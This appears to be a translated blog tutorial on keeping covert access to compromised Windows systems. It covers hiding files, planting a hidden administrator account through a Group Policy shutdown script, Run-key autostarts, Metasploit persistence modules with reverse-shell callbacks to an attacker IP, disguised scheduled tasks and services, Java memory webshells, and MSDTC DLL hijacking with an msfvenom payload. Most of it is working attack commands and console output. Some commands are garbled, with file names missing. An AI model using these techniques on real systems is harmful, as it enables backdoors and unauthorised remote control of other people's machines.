Windows privilege maintenance
I. Documentation level
1)attrib
Using the Attrib +s +a +h +r command
s: sets the System attribute a: sets the Archive attribute h: sets the Hidden attribute
r: Set the Read-only attribute (Read-only)
attrib +s +a +h +r c:\test
After the command is executed, we don't see the test directory, but it exists and can be accessed.
If you want to see it, delete the corresponding attribute
The test folder is showing up.
2) System icon hiding
It is possible to rename the folderMy computer. {20D04FE0-3AEA-1069-A2D8-08002B30309D}
The icon becomes My Computer, and double-clicking on it also gets you to My Computer, but not to the contents of our folder.
But you can see the folder on the command line, and you can also access and view the contents of the folder
Common Folder Names
My computer. {20D04FE0-3AEA-1069-A2D8-08002B30309D}
Recycle Bin. {645ff040-5081-101b-9f08-00aa002f954e}
Unplugged network. {992CFFA0-F557-101A-88EC-00DD010CCC48}
printer. {2227a280-3aea-1069-a2de-08002b30309d}
Control Panel. {21ec2020-3aea-1069-a2dd-08002b30309d}
Network Neighborhood. {208d2c60-3aea-1069-a2d7-08002b30309d}
3) Name of the deformity
Create a file with the nametest...\
The display name istest...
This file can be seen, but the internal files cannot be accessed or deleted.
md test...\
copy test...\
Deleting in the interactive interface shows that the item cannot be found.
I'm getting an error when I open the file inside, and it won't let me see it.
The only way to remove it is to execute the
-
/s
Indicates that the files in the specified directory and all subdirectories are deleted recursively. -
/q
Indicates quiet mode, i.e., direct deletion without prompting for confirmation.
rd /s /q c:\test...\
4) Driver-level file hiding
The most typical phenomenon of driver hiding is the presence of the following files in the system disk:
c:\WINDOWS\
c:\WINDOWS\
c:\WINDOWS\
c:\WINDOWS\system32\drivers\
Drive hiding can be achieved with EasyFileLocker.
Download link./s/1h2_k1picYeinpz3XtI8ypA?pwd = 141d
Extract code: 141d
Attributes can be selected to enable hiding of files
To delete
1. Query service status: sc qc xlkfs
2, stop the service: net stop xlkfs service stops, the driver level hidden files can be revealed!
3. Delete the service: sc delete xlkfs
4. Delete the files under the system directory and restart the system to make sure the services have been cleaned up.
II. Group Policy
The Group Policy backdoor is even more insidious, in that it can be executed automatically when the computer completes the corresponding operation. For example, the shutdown operation
echo off
net user lingx5$ 1234 /add
net localgroup administrators lingx5$ /add
exit
Copy this to the center.
This script is a way to add a lingx5 $: 1234 users, and puts thelingx5
This user is added to theadministrators
user group to$
The user at the end of the symbol is what we often refer to as a shadow user (hidden user). It is very difficult for the average user to discover this user name, and even if he discovers and deletes the user, at the next shutdown, the group policy we injected will still be enforced, and the user will be created again.
Win+r to open input --> locate "Computer Configuration I > Windows Settings I > Scripts (Startup/Shutdown)"
In the shutdown properties add
restart the computer
It was added successfully and is not viewable by the net user command
Group Policy can not only add users for maintenance, attackers can also put some malicious scripts or programs to run through the group policy, but also can sniff the administrator's password and so on.
III. Registry
1) Add manually
Registries are also commonly used by attackers as a means of defending their rights because the information in a registry is huge, so information in a registry can be much more hidden and difficult to troubleshoot.
-
reg add
: is a command used to add or modify registry entries. -
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
: Specifies the registry path to be manipulated, which is the location used to store information about the current user's self-starting program. -
/v Pentestlab
: Set the name of the registry entry to be added to "loaclUser".(can be customized) -
/t REG_SZ
: Specifies that the data type of the registry entry is of string type (REG_SZ). -
/d "C:\Users\tmp\"
: Set the value of the registry entry to "C:\Users\tmp\", i.e. specify the path of the self-starting program to this executable.(here to enact our * horse, backdoor program)
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v
loaclUser /t REG_SZ /d "C:\Users\tmp\"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v
loaclUser /t REG_SZ /d "C:\Users\tmp\"
reg add
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v
loaclUser /t REG_SZ /d "C:\Users\tmp\"
reg add
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v
loaclUser /t REG_SZ /d "C:\Users\tmp\"
Two additional registry locations that could allow an attacker to achieve persistence by executing arbitrary payloads or DLLs. These will be executed during login and require administrator level privileges.
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v
loaclUser /t REG_SZ /d "C:\tmp\"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Dep
end" /v loaclUser /t REG_SZ /d "C:\tmp\"
2) meterpreter persistence
a) persistence module
Of course there are modules for automated additions in meterpreter, and when the machine goes live with our msf, you can use the module persistence
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/persistence
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/persistence) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/persistence) > set session 1
session => 1
msf6 exploit(windows/local/persistence) > set lhost 192.168.84.128
lhost => 192.168.84.128
msf6 exploit(windows/local/persistence) > set lport 4444
lport => 4444
msf6 exploit(windows/local/persistence) > set startup USER
startup => USER
msf6 exploit(windows/local/persistence) > run
[*] Running persistent module against DESKTOP-906JKQ3 via session ID: 1
[+] Persistent VBS script written on DESKTOP-906JKQ3 to C:\Users\lingx5\AppData\Local\Temp\
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svwTznRkXi
[+] Installed autorun on DESKTOP-906JKQ3 as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svwTznRkXi
[*] Clean up Meterpreter RC file: /home/kali/.msf4/logs/persistence/DESKTOP-906JKQ3_20240827.3418/DESKTOP-906JKQ3_20240827.
msf6 exploit(windows/local/persistence) >
With the background command in meterpreter, use thewindows/local/persistence
Module DesignationThe id of the sessionand setup parameters, generate vbs scripts in the tmp directory, and automatically add registry tasks
Just listen in kali and wait for the target to log in to connect
This kind of has a disadvantage, that is, the program is not our own do not kill, it is easy to be killed by antivirus software, resulting in the * horse did not have a way online
b) persistence_exe module
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/manage/persistence_exe
msf6 post(windows/manage/persistence_exe) > set session 1
session => 1
msf6 post(windows/manage/persistence_exe) > set rexepath /opt/win_exp/win_exp.exe
rexepath => /opt/win_exp/win_exp.exe
msf6 post(windows/manage/persistence_exe) > set rexename
rexename =>
msf6 post(windows/manage/persistence_exe) > run
[*] Running module against DESKTOP-906JKQ3
[*] Reading Payload from file /opt/win_exp/win_exp.exe
[+] Persistent Script written to C:\Users\lingx5\AppData\Local\Temp\
[*] Executing script C:\Users\lingx5\AppData\Local\Temp\
[+] Agent executed with PID 2076
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dJggfAUjDAS
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dJggfAUjDAS
[*] Cleanup Meterpreter RC File: /home/kali/.msf4/logs/persistence/DESKTOP-906JKQ3_20240827.0058/DESKTOP-906JKQ3_20240827.
[*] Post module execution completed
msf6 post(windows/manage/persistence_exe) >
rexepath specifies to make the local no-kill/opt/win_exp/win_exp.exe
rexename specifies the name of the uploaded file.(It's usually the system's service name, which is harder to detect)The default file directory is the %TEMP% directory.
The downside is that you can't specify the path to the uploaded file and it's not well hidden.
Still recommend uploading with upload, manually adding registries, etc. to defend your rights
c) WMI Persistence
msf6 exploit(windows/local/wmi_persistence) > show options
Module options (exploit/windows/local/wmi_persistence):
Name Current Setting Required Description
---- --------------- -------- -----------
CALLBACK_INTERVAL 1800000 yes Time between callbacks (In milliseconds). (Default: 1800000).
CLASSNAME UPDATER yes WMI event class name. (Default: UPDATER)
EVENT_ID_TRIGGER 4624 yes Event ID to trigger the payload. (Default: 4625)
PERSISTENCE_METHOD EVENT yes Method to trigger the payload. (Accepted: EVENT, INTERVAL, LOGON, PROCESS, WAIT
FOR)
PROCESS_TRIGGER yes The process name to trigger the payload. (Default: )
SESSION 1 yes The session to run this module on
USERNAME_TRIGGER BOB yes The username to trigger the payload. (Default: BOB)
WAITFOR_TRIGGER CALL yes The word to trigger the payload. (Default: CALL)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '',seh,thread,process, none)
LHOST 192.168.84.128 yes The listen address (an interface may bespecified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (no handler will be created!)**
Parameter Description:
-
CALLBACK_INTERVAL
: Specifies the interval between callbacks in milliseconds. The default is 1800000 milliseconds (30 minutes), which means that the persistent Payload is triggered every 30 minutes. -
CLASSNAME
: The name of the WMI event class. This name is used in the target system to identify this persistence task. The default isUPDATER
, you can change it to some other unobtrusive name. -
EVENT_ID_TRIGGER
: Specifies which event ID triggers the Payload. default is4625
This is a common logon failure event in Windows logs. You can change this to other event IDs if you want (e.g., the event ID of a successful logon).4624
) to trigger Payloads more flexibly. -
PERSISTENCE_METHOD
: Select the trigger method for persistence. The following are the available trigger methods:-
EVENT
: Triggered based on event ID (e.g. login failure event). -
INTERVAL
: periodic triggers (based onCALLBACK_INTERVAL
)。 -
LOGON
: Triggered when the user logs in. -
PROCESS
: Triggered when the specified process is started (e.g., the)。
-
WAITFOR
: Triggered when the system is waiting for a specific keyword.
-
-
PROCESS_TRIGGER
:: Only ifPERSISTENCE_METHOD
set toPROCESS
When valid, specify the name of the process to be monitored. Payload is triggered when this process is started. The default is, which you can change to any other legitimate process you wish to monitor.
-
SESSION
: The target session (session ID) on which you want to run the module. This parameter must be set. -
USERNAME_TRIGGER
:: Only ifPERSISTENCE_METHOD
set toLOGON
The payload is triggered when the user name logs in.BOB
, you can change to the actual username in the target system. -
WAITFOR_TRIGGER
:: Only ifPERSISTENCE_METHOD
set toWAITFOR
When valid, specifies the keyword that triggers the Payload. The default isCALL
。
Payload Options (windows/x64/meterpreter/reverse_tcp
)
-
EXITFUNC
: Specifies the method of exit:-
process
: Default option, ends the current process on exit. -
seh
: Exit using the Structured Exception Handling (SEH) mechanism. -
thread
: Only the current thread is terminated on exit. -
none
:: No exit action is taken.
-
-
LHOST
: The listening address (IP) of your attacking machine. This is the address of the target system's return connection, usually your local IP or VPS IP. -
LPORT
: The listening port of your attacker. The target system will connect to this port when it returns. -
DisablePayloadHandler
: If set toTrue
Metasploit does not automatically start the Payload's handler. This is often used to avoid conflicts when other listeners are already running.
typical example
use windows/local/wmi_persistence
set session 1
set persistence_method EVENT
set event_id_trigger 4624
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.84.128
set lport 4444
run
One thing to keep in mind though:To use this module, we have to get admin access to the target system.
d) Adding users
post/windows/manage/add_user
Create a hidden user with administrator rights to revisit later.
use post/linux/manage/add_user
set session 1
set USER test
set PASS 1234
run
I have normal user permissions here, so it didn't add successfully
You also need to get the permission to add users to be able to add them successfully.
e) Creation of services
persistence_service
This module creates new services for the purpose of privilege maintenance
use exploit/windows/local/persistence_service
set SESSION 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.84.128
set LPORT 4444
set REMOTE_EXE_NAME
set SERVICE_NAME WindowsUpdateService
set SERVICE_DISPLAY_NAME "Windows Update Service"
set SERVICE_DESCRIPTION "Provides updates for the Windows operating system."
set STARTUP auto
run
Requires administrator privileges
IV. Planned tasks
The Windows operating system provides a utility () that enables system administrators to execute programs or scripts at specific dates and times.
This behavior can be exploited by attackers as a persistence mechanism. Performing persistence through scheduled tasks does not require administrator privileges, but can be exploited by an attacker who has been given access to a program to perform persistence through a scheduled task.
The elevated privileges allow further operations, such as performing tasks during user login or during an idle state.
SCHTASKS
is a built-in command line tool in Windows that can be used to create, delete and manage scheduled tasks.
schtasks /create /tn "Windows Update Service" /tr "C:\Windows\System32\" /sc onlogon /ru "SYSTEM"
Parameter Explanation:
-
/create
: Create a new task. -
/tn "Windows Update Service"
: Task name (here disguised as "Windows Update Service"). -
/tr "C:\Windows\System32\"
: The path of the program to be executed by the task. -
/sc onlogon
: Trigger for the task, set here to be triggered when the user logs in (you can also set other triggers, such as system startup)/sc onstart
)。 -
/ru "SYSTEM"
: Run the task with SYSTEM privileges (this is often used to ensure elevated privilege execution).
Common Trigger Conditions:
-
/sc minute
:: Executed every few minutes. -
/sc daily
:: Implemented on a daily basis. -
/sc onstart
: Executed at system startup. -
/sc onlogon
: Executed when the user logs in.
Validation:
schtasks /query /tn "Windows Update Service"
V. Creating services
Services in the Windows environment may result in elevated privileges if they are not properly configured or if they can be used as a persistence method. Creating a new service requires administrator-level privileges, and it is no longer a covert persistence technique. However, in a red team operation, targeting companies that are immature in threat detection can be used to create further disruption, and organizations should build SOC capabilities to identify threats that use basic techniques in their malware.
sc create ServiceName binPath= "C:\Path\To\Your\" start= auto
-
ServiceName
:Define your own more cryptic service name. -
binPath
: Specify the path where the backdoor script exists -
start
: Start-up mode
PowerShell creates a new service
New-Service -Name "SystemUpdate" -BinaryPathName "C:\temp\" -Description "systemupdate" -StartupType Automatic
sc start pentestlab
Memory
Memory horses are a form of fileless attacks. Fileless attacks can effectively evade detection by traditional security software by executing remotely loaded in the system's memory, residing in the registry, or abusing commonly used whitelisting tools such as PowerShell, WMl and PsExec. Fileless attack techniques allow attackers to access the system to enable subsequent malicious activity. By manipulating vulnerability exploits, legitimate tools, macros and scripts, an attacker can compromise a system, elevate privileges or spread malicious code laterally across a network. Moreover, fileless threats leave no trace after execution, which makes them difficult to detect and remove.
Memory horses don't land on files and are hard to detect by traffic monitoring systems, so they are hard to find and troubleshoot
principle
memory injection:
- Memory horses reside in memory without touching the disk by injecting malicious code directly into the memory of the target process or by loading malicious classes and functions. This injection avoids traditional disk-based detection means such as antivirus software or file integrity monitoring.
Hooking Key Components:
- Memory horses typically enable malicious code to intercept, modify, or execute specific requests by hooking into system APIs, web server request handling functions, or the core logic of an application framework. For example:
- In Web containers (e.g. Tomcat, JBoss, WebLogic), the memory horse can hook the
Servlet
maybeFilter
component that listens for HTTP requests and executes malicious logic when a specific request arrives. - NET environments, Memory Horse may hook into the HTTP request processing pipeline.
- In Web containers (e.g. Tomcat, JBoss, WebLogic), the memory horse can hook the
categorization
1.servlet-api type :Dynamically register a new listener, filter or servlet through command execution to realize command execution and other functions. Specific frameworks, containers, memory horse principle is similar to this, such as spring's controller memory horse, tomcat valve memory horse
2.Byte Code Enhanced. Dynamic modification of existing code through the java instrumentation, and then realize the command execution and other functions.
Common is the java memory horse, which is related to the process of java request processing:
The client initiates an http request, say of type get.
Servlet container receives the request and encapsulates it into HttpServletRequest and HttpServletResponse objects based on the request information.
The Servlet container calls the init() method of the HttpServlet. The init method is called only on the first request.
The Servlet container calls the service() method.
The service() method calls the doGet or doPost method according to the request type, which is get, and here the doGet method is called.
Here we call the doGet method. In the doGet method, we write our own business logic.
After the business logic is processed, it is returned to the Servlet container, which then returns the results to the client.
When the container is closed, the destory method is called.
In the doGet method, we write malicious code, which will be loaded into the system memory by the servlet container, thus achieving the purpose of memory horse injection
realization
Take the servletAPI-type memory shield of tomcat as an example to talk about the implementation of memory shield.
Create a malicious servlet, then get the current StandardContext, then wrap the malicious servlet into a wrapper and add it to the
Among the children of StandardContext, finally add ServletMapping to bind the access URL to the wrapper.
0x00 Hijacking Backdoor
But the memory horse still has a drawback: as soon as the container or service is shut down and restarted, the destory() method will be called, killing the memory horse and recycled by jvm's garbage collection mechanism.
VII. Hijacking the back door
Introduction to MSDTC
is the Microsoft Distributed Transport Coordinator program. The process calls the systems Microsoft Personal Web Server and Microsoft SQL
Server. which is used to manage multiple servers.
is a concurrent transaction that is distributed across more than two databases, message queues, file systems, or other transaction-protected resource managers, deleting the
Be careful.
Corresponding service MSDTC, full name Distributed Transaction Coordinator, Windows system default start the service
Corresponding process, located at %windir%system32
principle
The attack begins when the Windows operating system starts the Microsoft Distributed Transaction Processing Coordinator (MSDTC) service, which coordinates transactions across multiple resource managers such as databases, message queues, and file systems. When the target computer joins the domain, once the MSDTC service starts, it searches the registry. When a computer joins a domain, the MSDTC service searches the registry once it starts
HKEY_LOCAL_MACHINE\SOFTWARE\MicrosoftMSDTC\MTxOCI
The MTxOCI component of the MSDTC service searches for three DLLs:,respond in singingWindows systems are not packaged by default.
contains, we write our own malicious one and place it in the%SystemRoot%\ system32 \
in. Ready, use the remote job command to kill the MSDTC service (taskkill / im / f), which causes MSDTC to reload itself. However, this time it will look for and find it. This time it will take advantage of this service to pull up our backdoor dll.
realization
Create a dll file
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.84.128 LPORT=4444 -f dll >
Upload the generated file to the C:\Windows\System32 directory of the target machine.
upload C:\Windows
shell
C:\Windows>move c:\Windows\System32
Put in system32 and restart the msdtc service.
taskkill /f /im
Reboot msdtc
net start msdtc
All of my articles are for technical sharing, they are used for documentation for defense purposes, and all operations are carried out in an experimental environment, so please do not use them for any other purpose, or suffer the consequences.